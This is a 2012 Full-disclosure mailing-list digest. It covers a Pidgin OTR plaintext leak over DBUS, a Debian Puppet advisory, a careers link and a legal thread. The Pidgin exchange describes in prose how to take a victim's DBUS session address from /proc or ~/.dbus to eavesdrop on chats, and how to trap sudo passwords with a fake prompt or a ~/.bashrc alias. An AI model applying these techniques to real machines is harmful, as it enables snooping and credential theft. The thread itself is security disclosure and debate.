> Basically, you're saying that if I have the rights of a user on a machine, I can access the private conversations of that user? Ooooh no. Well, I can also copy his keyfiles, no? And I can alter his settings. And spawn fake "Update didn't work, please enter root password to proceed" windows. I could alter his ~/.bashrc so that whenever he launches sudo or su, a script is launched instead that grabs his password.
>
> So, please, what's the point?

I think you didn't understand the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation.

Simple as that, without impersonating user 1 or knowing his password.

Cheers
antisnatchor
[Full-disclosure] [SECURITY] [DSA 2419-1] puppet security update
Debian Security Advisory DSA-2419-1                   secur...@debian.org
http://www.debian.org/security/                            Florian Weimer
February 27, 2012                      http://www.debian.org/security/faq

Package        : puppet
Vulnerability  : several
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2012-1053 CVE-2012-1054

Two vulnerabilities were discovered in Puppet, a centralized configuration management tool.

CVE-2012-1053
    Puppet runs execs with an unintended group privileges, potentially leading to privilege escalation.

CVE-2012-1054
    The k5login type writes to untrusted locations, enabling local users to escalate their privileges if the k5login type is used.

For the stable distribution (squeeze), these problems have been fixed in version 2.6.2-5+squeeze4.

For the testing distribution (wheezy) and the unstable distribution (sid), these problems have been fixed in version 2.7.11-1.

We recommend that you upgrade your puppet packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] Soft skills needed for an information security career?
Two people can interview for a position who look to be nearly equal in terms of experience, yet a hiring manager comes away with a strong recommendation to hire one and not the other. Or sometimes there are even instances in which someone may appear to be even stronger in terms of experience and training, and yet someone else gets the job. Setting aside potential discrimination issues, a very valid difference could be what some would call soft skills, or behavioral skills. These skills are the intangibles that really pull everything together and drive someone's success or failure in a role.

Read more at: http://resources.infosecinstitute.com/soft-skills-hiring/
Re: [Full-disclosure] pidgin OTR information leakage
On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote:
> On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:
>> I think you didn't understand the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation.
>
> This is not what the OP or CVE describe:
>
>   plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account.
>
> Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue.

I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance).

DBUS is on my list of things to probe, prod, and attack due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good at separating processes and sessions so that data does not comingle.

Jeff
Re: [Full-disclosure] pidgin OTR information leakage
On Mon, Feb 27, 2012 at 10:27 PM, Jeffrey Walton noloa...@gmail.com wrote:
> On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote:
>> On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:
>>> I think you didn't understand the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation.
>>
>> This is not what the OP or CVE describe:
>>
>>   plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account.
>>
>> Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue.
>
> I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance).
>
> DBUS is on my list of things to probe, prod, and attack due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good at separating processes and sessions so that data does not comingle.
>
> Jeff

Exploitation Notes

For the purpose of explaining the exploitation impact of this bug we will focus on a popular libpurple-based application, Pidgin. To snoop in on a Pidgin user’s conversation a remote attacker would need to connect to the DBUS daemon that is responsible for the user’s session. There are at least two ways to achieve this.

The first one is to exploit an application that runs within the same desktop session as Pidgin. This application would have inherited the necessary DBUS_SESSION_BUS_ADDRESS environmental variable and will thus be able to connect to the DBUS daemon over a unix socket without a problem.

The second way is to compromise the user’s account in some way and steal the DBUS_SESSION_BUS_ADDRESS value. There are multiple ways of acquiring the value for this variable, one of them being through /proc/pid/environ (which is accessible to processes of the same owner), and another being through a file in ~/.dbus/session-bus/. Using this value, the attacker will now be able to connect to DBUS with applications that are not part of the desktop session.

Please note that the above methods do not require any control over the Pidgin process (ptrace or other).

so you either need to be able to dump the environment variable from a process run by the victim, or read files which AFAIK only the victim (and root ofc) has access to.
did I miss anything?

--
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Eleventh Circuit Finds Fifth Amendment Right Against Self Incrimination Protects Against Being Forced to Decrypt Hard Drive Contents
On 2/27/2012 12:11 PM, valdis.kletni...@vt.edu wrote:
> On Mon, 27 Feb 2012 01:38:56 MST, Sanguinarious Rose said:
>> This isn't anything new
>
> Yeah, the decision was released all the way back on Feb 23, four whole days ago, that's practically last century in Internet time...
>
> So tell me - what's your definition of new (obviously significantly less than 4 days), and how does it affect threads on F-D that last longer than 4 days?

not told [ ]
Told [x]

oh snap